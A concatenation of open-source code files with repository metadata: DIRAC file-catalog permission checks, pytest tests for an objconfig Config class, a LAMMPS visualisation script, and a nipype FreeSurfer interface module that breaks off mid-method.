if self.__shareVomsRole(credDict.get('group', 'anon'), origGrp):
credDict = {'username': credDict.get('username', 'anon'), 'group': origGrp}
return returnSingleResult(self.db.fileManager.getPathPermissions([path], credDict))
def __testPermissionOnFile(self, paths, permission, credDict, noExistStrategy=None):
""" Tests a permission on a list of files
:param path : list/dict of file paths
:param permission : Read/Write/Execute string
:param credDict : credential of the user
:param noExistStrategy : If the directory does not exist, we can
* True : allow the access
* False : forbid the access
* None : return the error as is
:returns: Successful dictionary with True of False, and Failed.
"""
successful = {}
failed = {}
for filename in paths:
res = self.__getFilePermission(filename, credDict, noExistStrategy=noExistStrategy)
if not res['OK']:
failed[filename] = res['Message']
else:
successful[filename] = res['Value'].get(permission, False)
return S_OK({'Successful': successful, 'Failed': failed})
def __getDirectoryPermission(self, path, credDict, recursive=True, noExistStrategy=None):
""" Checks POSIX permission for a directory using the VOMS roles.
That is, if the owner group of the directory share the same vomsRole as the requesting user,
we check the permission as if the request was done with the real owner group.
:param path : directory path (string)
:param credDict : credential of the user
:param recursive : if that directory does not exist, checks the parent one
:param noExistStrategy : If the directory does not exist, we can
* True : allow the access
* False : forbid the access
* None : return the error as is
noExistStrategy makes sense only if recursive is False
:returns S_OK structure with a dictionary ( Read/Write/Execute : True/False)
"""
if not path:
return S_ERROR('Empty path')
# We check what is the group stored in the DB for the given path
res = self.db.dtree.getDirectoryParameters(path)
if not res['OK']:
# If the error is not due to the directory not existing, we return
if not self.__isNotExistError(res['Message']):
return res
# Very special case to allow creation of very first entry
if path == '/':
return S_OK({'Read': True, 'Write': True, 'Execute': True})
# From now on, we know that the error is due to the directory not existing
# If recursive, we try the parent directory
if recursive:
return self.__getDirectoryPermission(os.path.dirname(path), credDict,
recursive=recursive, noExistStrategy=noExistStrategy)
# From now on, we know we don't run recursive
# If we have no strategy regarding non existing directories, then just return the error
if noExistStrategy is None:
return res
# Finally, follow the strategy
return S_OK(dict.fromkeys(['Read', 'Write', 'Execute'], noExistStrategy))
# The directory exists.
origGrp = res['Value']['OwnerGroup']
# If the two group share the same voms role, we do the query like if we were
# the group stored in the DB
if self.__shareVomsRole(credDict.get('group', 'anon'), origGrp):
credDict = {'username': credDict.get('username', 'anon'), 'group': origGrp}
return self.db.dtree.getDirectoryPermissions(path, credDict)
def __testPermissionOnDirectory(self, paths, permission, credDict, recursive=True, noExistStrategy=None):
""" Tests a permission on a list of directories
:param path : list/dict of directory paths
:param permission : Read/Write/Execute string
:param credDict : credential of the user
:param recursive : if that directory does not exist, checks the parent one
:param noExistStrategy : If the directory does not exist, we can
* True : allow the access
* False : forbid the access
* None : return the error as is
noExistStrategy makes sense only if recursive is False
:returns: Successful dictionary with True of False, and Failed.
"""
successful = {}
failed = {}
for dirName in paths:
res = self.__getDirectoryPermission(dirName, credDict, recursive=recursive, noExistStrategy=noExistStrategy)
if not res['OK']:
failed[dirName] = res['Message']
else:
successful[dirName] = res['Value'].get(permission, False)
return S_OK({'Successful': successful, 'Failed': failed})
def __testPermissionOnParentDirectory(self, paths, permission, credDict, recursive=True, noExistStrategy=None):
""" Tests a permission on the parents of a list of directories
:param path : directory path (string)
:param permission : Read/Write/Execute string
:param credDict : credential of the user
:param recursive : if that directory does not exist, checks the parent one
:param noExistStrategy : If the directory does not exist, we can
* True : allow the access
* False : forbid the access
* None : return the error as is
noExistStrategy makes sense only if recursive is False
:returns: Successful dictionary with True of False, and Failed.
"""
parentDirs = {}
for path in paths:
parentDirs.setdefault(os.path.dirname(path), []).append(path)
res = self.__testPermissionOnDirectory(parentDirs, permission, credDict,
recursive=recursive, noExistStrategy=noExistStrategy)
if not res['OK']:
return res
failed = res['Value']['Failed']
successful = {}
parentAllowed = res['Value']['Successful']
for parentName in parentAllowed:
isParentAllowed = parentAllowed[parentName]
for path in parentDirs[parentName]:
successful[path] = isParentAllowed
return S_OK({'Successful': successful, 'Failed': failed})
def __getFileOrDirectoryPermission(self, path, credDict, recursive=False, noExistStrategy=None):
""" Checks POSIX permission for a directory or file using the VOMS roles.
That is, if the owner group of the directory or file shares the same vomsRole as the requesting user,
we check the permission as if the request was done with the real owner group.
We first consider the path as a file, and if it does not exist, we consider it as a directory.
:param path : directory or file path (string)
:param credDict : credential of the user
:param recursive : if that directory does not exist, checks the parent one
:param noExistStrategy : If the directory does not exist, we can
* True : allow the access
* False : forbid the access
* None : return the error as is
noExistStrategy makes sense only if recursive is False
:returns S_OK structure with a dictionary ( Read/Write/Execute : True/False)
"""
# First consider it as File
# We want to know whether the file does not exist, so we force noExistStrategy to None
res = self.__getFilePermission(path, credDict, noExistStrategy=None)
if not res['OK']:
# If the error is not due to the directory not existing, we return
if not self.__isNotExistError(res['Message']):
return res
# From now on, we know that the error is due to the File not existing
# We Try then the directory method, since path can be a directory
# The noExistStrategy will be applied by __getDirectoryPermission, so we don't need to do it ourselves
res = self.__getDirectoryPermission(path, credDict, recursive=recursive, noExistStrategy=noExistStrategy)
return res
def __testPermissionOnFileOrDirectory(self, paths, permission, credDict, recursive=False, noExistStrategy=None):
""" Tests a permission on a list of files or directories.
:param path : list/dict of directory or files paths
:param permission : Read/Write/Execute string
:param credDict : credential of the user
:param recursive : if that directory does not exist, checks the parent one
:param noExistStrategy : If the directory does not exist, we can
* True : allow the access
* False : forbid the access
* None : return the error as is
noExistStrategy makes sense only if recursive is False
:returns: Successful dictionary with True of False, and Failed.
"""
successful = {}
failed = {}
for path in paths:
res = self.__getFileOrDirectoryPermission(path, credDict, recursive=recursive, noExistStrategy=noExistStrategy)
if not res['OK']:
failed[path] = res['Message']
else:
successful[path] = res['Value'].get(permission, False)
return S_OK({'Successful': successful, 'Failed': failed})
def __policyRemoveDirectory(self, paths, credDict):
""" Tests whether the remove operation on directories
is permitted.
Removal of non existing directory is always allowed.
For existing directories, we must have the write permission
on the parent
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True of False, and Failed.
"""
successful = {}
# We allow removal of all the non existing directories
res = self.db.dtree.exists(paths)
if not res['OK']:
return res
nonExistingDirectories = set(path for path in res['Value']['Successful'] if not res['Value']['Successful'][path])
existingDirs = set(paths) - set(nonExistingDirectories)
for dirName in nonExistingDirectories:
successful[dirName] = True
res = self.__testPermissionOnParentDirectory(existingDirs, 'Write', credDict, recursive=False)
if not res['OK']:
return res
failed = res['Value']['Failed']
successful.update(res['Value']['Successful'])
return S_OK({'Successful': successful, 'Failed': failed})
def __policyRemoveFile(self, paths, credDict):
""" Tests whether the remove operation on files
is permitted.
Removal of non existing file is always allowed.
For existing files, we must have the write permission
on the parent
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True of False, and Failed.
"""
successful = {}
# We allow removal of all the non existing files
res = self.db.fileManager.exists(paths)
if not res['OK']:
return res
nonExistingFiles = set(path for path in res['Value']['Successful'] if not res['Value']['Successful'][path])
existingFiles = set(paths) - set(nonExistingFiles)
for dirName in nonExistingFiles:
successful[dirName] = True
res = self.__testPermissionOnParentDirectory(existingFiles, 'Write', credDict, recursive=False)
if not res['OK']:
return res
failed = res['Value']['Failed']
successful.update(res['Value']['Successful'])
return S_OK({'Successful': successful, 'Failed': failed})
def __policyListDirectory(self, paths, credDict):
""" Test Read permission on the directory.
If the directory does not exist, we do not allow.
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True of False, and Failed.
"""
return self.__testPermissionOnDirectory(paths, 'Read', credDict,
recursive=True)
def __policyReadForFileAndDirectory(self, paths, credDict):
""" Testing the read bit on the parent directory,
be it a file or a directory.
So it reads permissions from a directory
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True of False, and Failed.
"""
return self.__testPermissionOnParentDirectory(paths, 'Read', credDict,
recursive=True)
def __policyWriteForFileAndDirectory(self, paths, credDict):
""" Testing the read bit on the parent directory (recursively),
be it a file or a directory.
So it reads permissions from a directory
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True of False, and Failed.
"""
return self.__testPermissionOnParentDirectory(paths, 'Write', credDict,
recursive=True)
def __policyReadForReplica(self, paths, credDict):
""" Test Read permission on the file associated to the replica.
If the file does not exist, we allow.
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True of False, and Failed.
"""
return self.__testPermissionOnFile(paths, 'Read', credDict,
noExistStrategy=True)
def __policyWriteForReplica(self, paths, credDict):
""" Test Write permission on the file associated to the replica.
If the file does not exist, we allow.
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True of False, and Failed.
"""
return self.__testPermissionOnFile(paths, 'Write', credDict,
noExistStrategy=True)
def __policyWriteOnFile(self, paths, credDict):
""" Test Write permission on the file.
If the file does not exist, we allow.
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True of False, and Failed.
"""
return self.__testPermissionOnFile(paths, 'Write', credDict,
noExistStrategy=True)
def __policyChangePathMode(self, paths, credDict):
""" Test Write permission on the directory/file.
If the directory/file does not exist, we allow.
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True of False, and Failed.
"""
return self.__testPermissionOnFileOrDirectory(paths, 'Write', credDict,
recursive=False, noExistStrategy=True)
def __policyDeny(self, paths, credDict):
""" Denies the access to all the paths given
:param paths: list/dict of path
:param credDict: credential of the user
:returns: Successful with True of False, and Failed.
"""
return S_OK({'Successful': dict.fromkeys(paths, False), 'Failed': {}})
def hasAccess(self, opType, paths, credDict):
""" Checks whether a given operation on given paths is permitted
:param opType: name of the operation (the FileCatalog methods in fact...)
:param paths: list/dictionary of path on which we want to apply the operation
:param credDict: credential of the users (with at least username, group and properties)
:returns: Successful dict with True or False, and Failed dict. In fact, it is not neccesarily
a boolean, rather an int (binary operation results)
"""
# Check if admin access is granted first
result = self.hasAdminAccess(credDict)
if not result['OK']:
return result
if result['Value']:
# We are admin, allow everything
return S_OK({'Successful': dict.fromkeys(paths, True), 'Failed': {}})
if opType not in _readMethods + _writeMethods:
return S_ERROR("Operation type not known %s" % opType)
if self.db.globalReadAccess and (opType in _readMethods):
return S_OK({'Successful': dict.fromkeys(paths, True), 'Failed': {}})
policyToExecute = None
if opType == 'removeDirectory':
policyToExecute = self.__policyRemoveDirectory
elif opType in ['createDirectory', 'addFile']:
policyToExecute = self.__policyWriteForFileAndDirectory
elif opType == 'removeFile':
policyToExecute = self.__policyRemoveFile
elif opType in ['addFileAncestors', 'setFileStatus', 'addReplica',
'removeReplica', 'setReplicaStatus', 'setReplicaHost']:
policyToExecute = self.__policyWriteOnFile
elif opType == 'listDirectory':
policyToExecute = self.__policyListDirectory
elif opType in ['isDirectory', 'getDirectoryReplicas', 'getDirectoryMetadata', 'getDirectorySize',
'isFile', 'getFileSize', 'getFileMetadata', 'exists',
'getFileAncestors', 'getFileDescendents']:
policyToExecute = self.__policyReadForFileAndDirectory
elif opType in ['getReplicas', 'getReplicaStatus']:
policyToExecute = self.__policyReadForReplica
# Only admin can do that, and if we are here, we are not admin
elif opType in ['changePathOwner', 'changePathGroup']:
policyToExecute = self.__policyDeny
elif opType == 'changePathMode':
policyToExecute = self.__policyChangePathMode
if not policyToExecute:
return S_ERROR("No policy matching operation %s" % opType)
res = policyToExecute(paths, credDict)
return res
def getPathPermissions(self, paths, credDict):
""" This method is meant to disappear, hopefully soon,
but as long as we have clients from versions < v6r14,
we need a getPathPermissions method. Since it does not make
sense with that kind of fine grain policy, we return what used to
be returned...
"""
return super(VOMSSecurityManager, self).getPathPermissions(paths, credDict)
|
yujikato/DIRAC
|
src/DIRAC/DataManagementSystem/DB/FileCatalogComponents/SecurityManager/VOMSSecurityManager.py
|
Python
|
gpl-3.0
| 23,076
|
[
"DIRAC"
] |
a744f9e153c1373774c7340ad63af7ebb5bf243202157303db55703f65f282b5
|
"""
Test objconfig.Config
"""
import pytest
from objconfig.exception import RuntimeException
from objconfig.exception import InvalidArgumentException
from objconfig import Config
def test_empty_instantiation():
try:
config = Config({})
except Exception:
assert False, "Empty Dictionary Instantiation Failed"
def test_normal_instantiation():
try:
config = Config({'spam': 'eggs'})
except Exception:
assert False, "Dictionary Instantiation Failed"
def test_with_config_instantiation():
try:
embed = Config({'spam': 'eggs'})
config = Config({'brian': embed})
except Exception:
assert False, "Instantiation With Config Failed"
assert config.brian.spam == 'eggs', "Instantiation With Config Failed"
def test_improper_instantiation():
with pytest.raises(InvalidArgumentException):
config = Config(['not', 'a', 'dictionary'])
def test_copy_config():
l = [1,2,3,4,5]
firstconfig = Config({'l': l})
secondconfig = firstconfig.copy()
l[0] = 6
assert secondconfig.l[0] == 1, "Config Not Deep Copied"
def test_setattr_getattr_config():
config = Config({}, allowModifications=True)
config.spam = 'eggs'
assert config.spam == 'eggs', "Config __setattr__/__getattr__ Not Working"
def test_len_config():
config = Config({'life': 'brian', 'spam': 'eggs'})
assert len(config) == 2, "Config __len__ Not Working"
def test_iter_config():
testagainst = {}
config = Config({'life': 'brian', 'spam': 'eggs'})
for key, value in config:
testagainst[key] = value
assert {'life': 'brian', 'spam': 'eggs'} == testagainst, "Config __iter__ Not Working"
def test_itemmethods_config():
config = Config({'life': 'brian', 'spam': {'ham': 'rabbit'}}, allowModifications=True)
assert config['life'] == 'brian', "Config __getitem__ Not Working"
config['spam']['ham'] = 'eggs'
assert config['spam']['ham'] == 'eggs', "Config __setitem__ Not Working"
del config['life']
assert {'spam': {'ham': 'eggs'}} == config.toArray(), "Config __delitem__ Not Working"
config.setReadOnly()
with pytest.raises(RuntimeException):
config['spam']['ham'] = 'foo'
with pytest.raises(InvalidArgumentException):
del config['spam']
def test_toArray_config():
config = Config({'life': 'brian', 'spam': {'ham': 'rabbit'}})
assert {'life': 'brian', 'spam': {'ham': 'rabbit'}} == config.toArray(), "Config toArray Not Working"
def test_isReadOnly_config():
config = Config({'life': 'brian', 'spam': {'ham': 'rabbit'}})
assert config.isReadOnly(), "Config isReadOnly Not Working"
def test_merge_config():
config = Config({'life': 'brian', 'spam': {'ham': 'rabbit'}})
merge = Config({'life': 'meaning', 'spam': {'ham': 'killer', 'new': 'ni'}})
config.merge(merge)
assert isinstance(config.spam, Config), "Config merge Not Working"
assert {'life': 'meaning', 'spam': {'ham': 'killer', 'new': 'ni'}} == config.toArray(), "Config merge Not Working"
|
asherwunk/objconfig
|
tests/test_config.py
|
Python
|
mit
| 3,046
|
[
"Brian"
] |
b8dfc28633fbc87d4382d790d704b9f91e51385983973f2f9bf28e57182ac643
|
#!/usr/bin/env python -i
# preceeding line should have path for Python on your machine
# viz_gl.py
# Purpose: viz running LAMMPS simulation via GL tool in Pizza.py
# Syntax: viz_gl.py in.lammps Nfreq Nsteps
# in.lammps = LAMMPS input script
# Nfreq = dump and viz shapshot every this many steps
# Nsteps = run for this many steps
import sys
sys.path.append("./pizza")
# parse command line
argv = sys.argv
if len(argv) != 4:
print "Syntax: viz_gl.py in.lammps Nfreq Nsteps"
sys.exit()
infile = sys.argv[1]
nfreq = int(sys.argv[2])
nsteps = int(sys.argv[3])
me = 0
# uncomment if running in parallel via Pypar
#import pypar
#me = pypar.rank()
#nprocs = pypar.size()
from lammps import lammps
lmp = lammps()
# run infile all at once
# assumed to have no run command in it
# dump a file in native LAMMPS dump format for Pizza.py dump tool
lmp.file(infile)
lmp.command("thermo %d" % nfreq)
lmp.command("dump python all atom %d tmp.dump" % nfreq)
# initial 0-step run to generate dump file and image
lmp.command("run 0 pre yes post no")
ntimestep = 0
# wrapper on GL window via Pizza.py gl tool
# just proc 0 handles reading of dump file and viz
if me == 0:
import Tkinter
tkroot = Tkinter.Tk()
tkroot.withdraw()
from dump import dump
from gl import gl
d = dump("tmp.dump",0)
g = gl(d)
d.next()
d.unscale()
g.zoom(1)
g.shift(0,0)
g.rotate(0,270)
g.q(10)
g.box(1)
g.show(ntimestep)
# run nfreq steps at a time w/out pre/post, read dump snapshot, display it
while ntimestep < nsteps:
lmp.command("run %d pre no post no" % nfreq)
ntimestep += nfreq
if me == 0:
d.next()
d.unscale()
g.show(ntimestep)
lmp.command("run 0 pre no post yes")
# uncomment if running in parallel via Pypar
#print "Proc %d out of %d procs has" % (me,nprocs), lmp
#pypar.finalize()
|
slitvinov/lammps-sph-multiphase
|
python/examples/viz_gl.py
|
Python
|
gpl-2.0
| 1,846
|
[
"LAMMPS"
] |
862e020766cc3620da229a6af2bb9a5478bcf1310b4e43aef32b9f9dde0c4913
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""The freesurfer module provides basic functions for interfacing with
freesurfer tools.
Change directory to provide relative paths for doctests
>>> import os
>>> filepath = os.path.dirname( os.path.realpath( __file__ ) )
>>> datadir = os.path.realpath(os.path.join(filepath, '../../testing/data'))
>>> os.chdir(datadir)
"""
__docformat__ = 'restructuredtext'
import os
from ..freesurfer.base import FSCommand, FSTraitedSpec
from ..base import (TraitedSpec, File, traits, InputMultiPath,
OutputMultiPath, Directory, isdefined)
from ...utils.filemanip import fname_presuffix, split_filename
class MRISPreprocInputSpec(FSTraitedSpec):
out_file = File(argstr='--out %s', genfile=True,
desc='output filename')
target = traits.Str(argstr='--target %s', mandatory=True,
desc='target subject name')
hemi = traits.Enum('lh', 'rh', argstr='--hemi %s',
mandatory=True,
desc='hemisphere for source and target')
surf_measure = traits.Str(argstr='--meas %s',
xor=('surf_measure', 'surf_measure_file', 'surf_area'),
desc='Use subject/surf/hemi.surf_measure as input')
surf_area = traits.Str(argstr='--area %s',
xor=('surf_measure', 'surf_measure_file', 'surf_area'),
desc='Extract vertex area from subject/surf/hemi.surfname to use as input.')
subjects = traits.List(argstr='--s %s...',
xor=('subjects', 'fsgd_file', 'subject_file'),
desc='subjects from who measures are calculated')
fsgd_file = File(exists=True, argstr='--fsgd %s',
xor=('subjects', 'fsgd_file', 'subject_file'),
desc='specify subjects using fsgd file')
subject_file = File(exists=True, argstr='--f %s',
xor=('subjects', 'fsgd_file', 'subject_file'),
desc='file specifying subjects separated by white space')
surf_measure_file = InputMultiPath(File(exists=True), argstr='--is %s...',
xor=('surf_measure', 'surf_measure_file', 'surf_area'),
desc='file alternative to surfmeas, still requires list of subjects')
source_format = traits.Str(argstr='--srcfmt %s', desc='source format')
surf_dir = traits.Str(argstr='--surfdir %s',
desc='alternative directory (instead of surf)')
vol_measure_file = InputMultiPath(traits.Tuple(File(exists=True),
File(exists=True)),
argstr='--iv %s %s...',
desc='list of volume measure and reg file tuples')
proj_frac = traits.Float(argstr='--projfrac %s',
desc='projection fraction for vol2surf')
fwhm = traits.Float(argstr='--fwhm %f',
xor=['num_iters'],
desc='smooth by fwhm mm on the target surface')
num_iters = traits.Int(argstr='--niters %d',
xor=['fwhm'],
desc='niters : smooth by niters on the target surface')
fwhm_source = traits.Float(argstr='--fwhm-src %f',
xor=['num_iters_source'],
desc='smooth by fwhm mm on the source surface')
num_iters_source = traits.Int(argstr='--niterssrc %d',
xor=['fwhm_source'],
desc='niters : smooth by niters on the source surface')
smooth_cortex_only = traits.Bool(argstr='--smooth-cortex-only',
desc='only smooth cortex (ie, exclude medial wall)')
class MRISPreprocOutputSpec(TraitedSpec):
out_file = File(exists=True, desc='preprocessed output file')
class MRISPreproc(FSCommand):
"""Use FreeSurfer mris_preproc to prepare a group of contrasts for
a second level analysis
Examples
--------
>>> preproc = MRISPreproc()
>>> preproc.inputs.target = 'fsaverage'
>>> preproc.inputs.hemi = 'lh'
>>> preproc.inputs.vol_measure_file = [('cont1.nii', 'register.dat'), \
('cont1a.nii', 'register.dat')]
>>> preproc.inputs.out_file = 'concatenated_file.mgz'
>>> preproc.cmdline
'mris_preproc --hemi lh --out concatenated_file.mgz --target fsaverage --iv cont1.nii register.dat --iv cont1a.nii register.dat'
"""
_cmd = 'mris_preproc'
input_spec = MRISPreprocInputSpec
output_spec = MRISPreprocOutputSpec
def _list_outputs(self):
outputs = self.output_spec().get()
outfile = self.inputs.out_file
outputs['out_file'] = outfile
if not isdefined(outfile):
outputs['out_file'] = os.path.join(os.getcwd(),
'concat_%s_%s.mgz' % (self.inputs.hemi,
self.inputs.target))
return outputs
def _gen_filename(self, name):
if name == 'out_file':
return self._list_outputs()[name]
return None
class MRISPreprocReconAllInputSpec(MRISPreprocInputSpec):
surf_measure_file = File(exists=True, argstr='--meas %s',
xor=('surf_measure',
'surf_measure_file', 'surf_area'),
desc='file necessary for surfmeas')
surfreg_file = File(
argstr="--surfreg %s", desc="Input surface registration file")
subject_id = traits.String(argstr='--s %s',
xor=(
'subjects', 'fsgd_file', 'subject_file', 'subject_id'),
desc='subject from who measures are calculated')
class MRISPreprocReconAll(MRISPreproc):
"""Extends MRISPreproc to allow it to be used in a recon-all workflow
Examples
--------
>>> preproc = MRISPreprocReconAll()
>>> preproc.inputs.target = 'fsaverage'
>>> preproc.inputs.hemi = 'lh'
>>> preproc.inputs.vol_measure_file = [('cont1.nii', 'register.dat'), \
('cont1a.nii', 'register.dat')]
>>> preproc.inputs.out_file = 'concatenated_file.mgz'
>>> preproc.cmdline
'mris_preproc --hemi lh --out concatenated_file.mgz --target fsaverage --iv cont1.nii register.dat --iv cont1a.nii register.dat'
"""
input_spec = MRISPreprocReconAllInputSpec
def _verify_file_location(self, filepath, name):
head, tail = os.path.split(filepath)
surf_dir = os.path.join(
self.inputs.subjects_dir, self.inputs.subject_id, 'surf')
if head != surf_dir:
raise traits.TraitError(
"MRIS_PreprocReconAll: {0} must be located in subjects_dir/subject_id/surf\
instead a file location of {1} was given".format(name, filepath))
def _format_arg(self, name, spec, value):
if name in ("surfreg_file", "surf_measure_file"):
self._verify_file_location(value, name)
return spec.argstr % os.path.basename(value).lstrip('rh.').lstrip('lh.')
return super(MRISPreprocReconAll, self)._format_arg(name, spec, value)
class GLMFitInputSpec(FSTraitedSpec):
glm_dir = traits.Str(argstr='--glmdir %s', desc='save outputs to dir',
genfile=True)
in_file = File(desc='input 4D file', argstr='--y %s', mandatory=True,
copyfile=False)
_design_xor = ('fsgd', 'design', 'one_sample')
fsgd = traits.Tuple(File(exists=True), traits.Enum('doss', 'dods'),
argstr='--fsgd %s %s', xor=_design_xor,
desc='freesurfer descriptor file')
design = File(exists=True, argstr='--X %s', xor=_design_xor,
desc='design matrix file')
contrast = InputMultiPath(File(exists=True), argstr='--C %s...',
desc='contrast file')
one_sample = traits.Bool(argstr='--osgm',
xor=('one_sample', 'fsgd', 'design', 'contrast'),
desc='construct X and C as a one-sample group mean')
no_contrast_sok = traits.Bool(argstr='--no-contrasts-ok',
desc='do not fail if no contrasts specified')
per_voxel_reg = InputMultiPath(File(exists=True), argstr='--pvr %s...',
desc='per-voxel regressors')
self_reg = traits.Tuple(traits.Int, traits.Int, traits.Int,
argstr='--selfreg %d %d %d',
desc='self-regressor from index col row slice')
weighted_ls = File(exists=True, argstr='--wls %s',
xor=('weight_file', 'weight_inv', 'weight_sqrt'),
desc='weighted least squares')
fixed_fx_var = File(exists=True, argstr='--yffxvar %s',
desc='for fixed effects analysis')
fixed_fx_dof = traits.Int(argstr='--ffxdof %d',
xor=['fixed_fx_dof_file'],
desc='dof for fixed effects analysis')
fixed_fx_dof_file = File(argstr='--ffxdofdat %d',
xor=['fixed_fx_dof'],
desc='text file with dof for fixed effects analysis')
weight_file = File(exists=True, xor=['weighted_ls'],
desc='weight for each input at each voxel')
weight_inv = traits.Bool(argstr='--w-inv', desc='invert weights',
xor=['weighted_ls'])
weight_sqrt = traits.Bool(argstr='--w-sqrt', desc='sqrt of weights',
xor=['weighted_ls'])
fwhm = traits.Range(low=0.0, argstr='--fwhm %f',
desc='smooth input by fwhm')
var_fwhm = traits.Range(low=0.0, argstr='--var-fwhm %f',
desc='smooth variance by fwhm')
no_mask_smooth = traits.Bool(argstr='--no-mask-smooth',
desc='do not mask when smoothing')
no_est_fwhm = traits.Bool(argstr='--no-est-fwhm',
desc='turn off FWHM output estimation')
mask_file = File(exists=True, argstr='--mask %s', desc='binary mask')
label_file = File(exists=True, argstr='--label %s',
xor=['cortex'],
desc='use label as mask, surfaces only')
cortex = traits.Bool(argstr='--cortex',
xor=['label_file'],
desc='use subjects ?h.cortex.label as label')
invert_mask = traits.Bool(argstr='--mask-inv',
desc='invert mask')
prune = traits.Bool(argstr='--prune',
desc='remove voxels that do not have a non-zero value at each frame (def)')
no_prune = traits.Bool(argstr='--no-prune',
xor=['prunethresh'],
desc='do not prune')
prune_thresh = traits.Float(argstr='--prune_thr %f',
xor=['noprune'],
desc='prune threshold. Default is FLT_MIN')
compute_log_y = traits.Bool(argstr='--logy',
desc='compute natural log of y prior to analysis')
save_estimate = traits.Bool(argstr='--yhat-save',
desc='save signal estimate (yhat)')
save_residual = traits.Bool(argstr='--eres-save',
desc='save residual error (eres)')
save_res_corr_mtx = traits.Bool(argstr='--eres-scm',
desc='save residual error spatial correlation matrix (eres.scm). Big!')
surf = traits.Bool(argstr="--surf %s %s %s",
requires=["subject_id", "hemi"],
desc="analysis is on a surface mesh")
subject_id = traits.Str(desc="subject id for surface geometry")
hemi = traits.Enum("lh", "rh", desc="surface hemisphere")
surf_geo = traits.Str("white", usedefault=True,
desc="surface geometry name (e.g. white, pial)")
simulation = traits.Tuple(traits.Enum('perm', 'mc-full', 'mc-z'),
traits.Int(min=1), traits.Float, traits.Str,
argstr='--sim %s %d %f %s',
desc='nulltype nsim thresh csdbasename')
sim_sign = traits.Enum('abs', 'pos', 'neg', argstr='--sim-sign %s',
desc='abs, pos, or neg')
uniform = traits.Tuple(traits.Float, traits.Float,
argstr='--uniform %f %f',
desc='use uniform distribution instead of gaussian')
pca = traits.Bool(argstr='--pca',
desc='perform pca/svd analysis on residual')
calc_AR1 = traits.Bool(argstr='--tar1',
desc='compute and save temporal AR1 of residual')
save_cond = traits.Bool(argstr='--save-cond',
desc='flag to save design matrix condition at each voxel')
vox_dump = traits.Tuple(traits.Int, traits.Int, traits.Int,
argstr='--voxdump %d %d %d',
desc='dump voxel GLM and exit')
seed = traits.Int(argstr='--seed %d', desc='used for synthesizing noise')
synth = traits.Bool(argstr='--synth', desc='replace input with gaussian')
resynth_test = traits.Int(argstr='--resynthtest %d', desc='test GLM by resynthsis')
profile = traits.Int(argstr='--profile %d', desc='niters : test speed')
force_perm = traits.Bool(argstr='--perm-force',
desc='force perumtation test, even when design matrix is not orthog')
diag = traits.Int('--diag %d', desc='Gdiag_no : set diagnositc level')
diag_cluster = traits.Bool(argstr='--diag-cluster',
desc='save sig volume and exit from first sim loop')
debug = traits.Bool(argstr='--debug', desc='turn on debugging')
check_opts = traits.Bool(argstr='--checkopts',
desc="don't run anything, just check options and exit")
allow_repeated_subjects = traits.Bool(argstr='--allowsubjrep',
desc='allow subject names to repeat in the fsgd file (must appear before --fsgd')
allow_ill_cond = traits.Bool(argstr='--illcond',
desc='allow ill-conditioned design matrices')
sim_done_file = File(argstr='--sim-done %s',
desc='create file when simulation finished')
class GLMFitOutputSpec(TraitedSpec):
glm_dir = Directory(exists=True, desc="output directory")
beta_file = File(exists=True, desc="map of regression coefficients")
error_file = File(desc="map of residual error")
error_var_file = File(desc="map of residual error variance")
error_stddev_file = File(desc="map of residual error standard deviation")
estimate_file = File(desc="map of the estimated Y values")
mask_file = File(desc="map of the mask used in the analysis")
fwhm_file = File(desc="text file with estimated smoothness")
dof_file = File(desc="text file with effective degrees-of-freedom for the analysis")
gamma_file = OutputMultiPath(desc="map of contrast of regression coefficients")
gamma_var_file = OutputMultiPath(desc="map of regression contrast variance")
sig_file = OutputMultiPath(desc="map of F-test significance (in -log10p)")
ftest_file = OutputMultiPath(desc="map of test statistic values")
spatial_eigenvectors = File(desc="map of spatial eigenvectors from residual PCA")
frame_eigenvectors = File(desc="matrix of frame eigenvectors from residual PCA")
singular_values = File(desc="matrix singular values from residual PCA")
svd_stats_file = File(desc="text file summarizing the residual PCA")
class GLMFit(FSCommand):
"""Use FreeSurfer's mri_glmfit to specify and estimate a general linear model.
Examples
--------
>>> glmfit = GLMFit()
>>> glmfit.inputs.in_file = 'functional.nii'
>>> glmfit.inputs.one_sample = True
>>> glmfit.cmdline == 'mri_glmfit --glmdir %s --y functional.nii --osgm'%os.getcwd()
True
"""
_cmd = 'mri_glmfit'
input_spec = GLMFitInputSpec
output_spec = GLMFitOutputSpec
def _format_arg(self, name, spec, value):
if name == "surf":
_si = self.inputs
return spec.argstr % (_si.subject_id, _si.hemi, _si.surf_geo)
return super(GLMFit, self)._format_arg(name, spec, value)
def _list_outputs(self):
outputs = self.output_spec().get()
# Get the top-level output directory
if not isdefined(self.inputs.glm_dir):
glmdir = os.getcwd()
else:
glmdir = os.path.abspath(self.inputs.glm_dir)
outputs["glm_dir"] = glmdir
# Assign the output files that always get created
outputs["beta_file"] = os.path.join(glmdir, "beta.mgh")
outputs["error_var_file"] = os.path.join(glmdir, "rvar.mgh")
outputs["error_stddev_file"] = os.path.join(glmdir, "rstd.mgh")
outputs["mask_file"] = os.path.join(glmdir, "mask.mgh")
outputs["fwhm_file"] = os.path.join(glmdir, "fwhm.dat")
outputs["dof_file"] = os.path.join(glmdir, "dof.dat")
# Assign the conditional outputs
if isdefined(self.inputs.save_residual) and self.inputs.save_residual:
outputs["error_file"] = os.path.join(glmdir, "eres.mgh")
if isdefined(self.inputs.save_estimate) and self.inputs.save_estimate:
outputs["estimate_file"] = os.path.join(glmdir, "yhat.mgh")
# Get the contrast directory name(s)
if isdefined(self.inputs.contrast):
contrasts = []
for c in self.inputs.contrast:
if split_filename(c)[2] in [".mat", ".dat", ".mtx", ".con"]:
contrasts.append(split_filename(c)[1])
else:
contrasts.append(os.path.split(c)[1])
elif isdefined(self.inputs.one_sample) and self.inputs.one_sample:
contrasts = ["osgm"]
# Add in the contrast images
outputs["sig_file"] = [os.path.join(glmdir, c, "sig.mgh") for c in contrasts]
